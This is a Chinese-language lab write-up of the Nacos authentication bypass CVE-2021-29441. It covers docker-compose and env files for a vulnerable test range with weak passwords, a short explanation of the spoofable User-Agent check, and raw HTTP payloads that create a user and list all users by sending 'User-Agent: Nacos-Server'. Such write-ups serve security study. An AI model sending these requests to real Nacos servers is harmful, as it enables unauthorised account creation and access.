Nacos 权限绕过漏洞 (CVE-2021-29441)
1. 靶场搭建
docker-compose 启动容器
$docker-compose up -d
启动后访问 http://192.168.1.39:37090/nacos/#/login
配置文件
#docker-compose.yml
version: "2"
services:
nacos:
#image: nacos/nacos-server:1.4.0
image: harbor.vackbot.com/vackbot/nacos/nacos-server:1.4.0
container_name: nacos-standalone-mysql
env_file:
- ./env/nacos-standlone-mysql.env
volumes:
- ./standalone-logs/:/home/nacos/logs
- ./init.d/vulnerabilities.properties:/home/nacos/init.d/custom.properties
ports:
- "37090:8848"
- "37091:9848"
- "37092:9555"
depends_on:
- mysql
restart: on-failure
mysql:
container_name: mysql
#image: nacos/nacos-mysql:5.7
image: harbor.vackbot.com/vackbot/nacos/nacos-mysql:5.7
env_file:
- ./env/mysql.env
volumes:
- ./mysql:/var/lib/mysql
ports:
- "37093:3306"
# env/mysql.env
MYSQL_ROOT_PASSWORD=root
MYSQL_DATABASE=nacos_devtest
MYSQL_USER=nacos
MYSQL_PASSWORD=nacos
NACOS_AUTH_ENABLE=true
# env/nacos-standlone-mysql.env
PREFER_HOST_MODE=hostname
MODE=standalone
SPRING_DATASOURCE_PLATFORM=mysql
MYSQL_SERVICE_HOST=mysql
MYSQL_SERVICE_DB_NAME=nacos_devtest
MYSQL_SERVICE_PORT=3306
MYSQL_SERVICE_USER=nacos
MYSQL_SERVICE_PASSWORD=nacos
MYSQL_SERVICE_DB_PARAM=characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true&useSSL=false
NACOS_AUTH_ENABLE=true
# init.d/vulnerabilities.properties
#spring.security.enabled=false
#management.security=false
#security.basic.enabled=false
#nacos.security.ignore.urls=/**
#management.metrics.export.elastic.host=http://localhost:9200
# metrics for prometheus
management.endpoints.web.exposure.include=*
# metrics for elastic search
#management.metrics.export.elastic.enabled=false
#management.metrics.export.elastic.host=http://localhost:9200
# metrics for influx
#management.metrics.export.influx.enabled=false
#management.metrics.export.influx.db=springboot
#management.metrics.export.influx.uri=http://localhost:8086
#management.metrics.export.influx.auto-create-db=true
#management.metrics.export.influx.consistency=one
#management.metrics.export.influx.compressed=true
2. 漏洞详情
nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。
Nacos 存在安全漏洞,该漏洞源于允许Nacos服务器绕过过滤器,从而跳过身份验证检查。这种机制依赖于用户代理HTTP头,因此很容易被欺骗。
payload
'''
#添加账号
POST /nacos/v1/auth/users?username=aaaa&password=bbbb
HTTP/1.1 2 Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#查看用户:
GET /nacos/v1/auth/users?pageNo=1&pageSize=100
HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
'''
漏洞链接:
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
https://github.com/advisories/GHSA-36hp-jr8h-556f
https://github.com/chibd2000/myscan/blob/fb022f7ba1c94751f7a26192a079dcb979203f4a/exploit/web/Nacos/unauth.py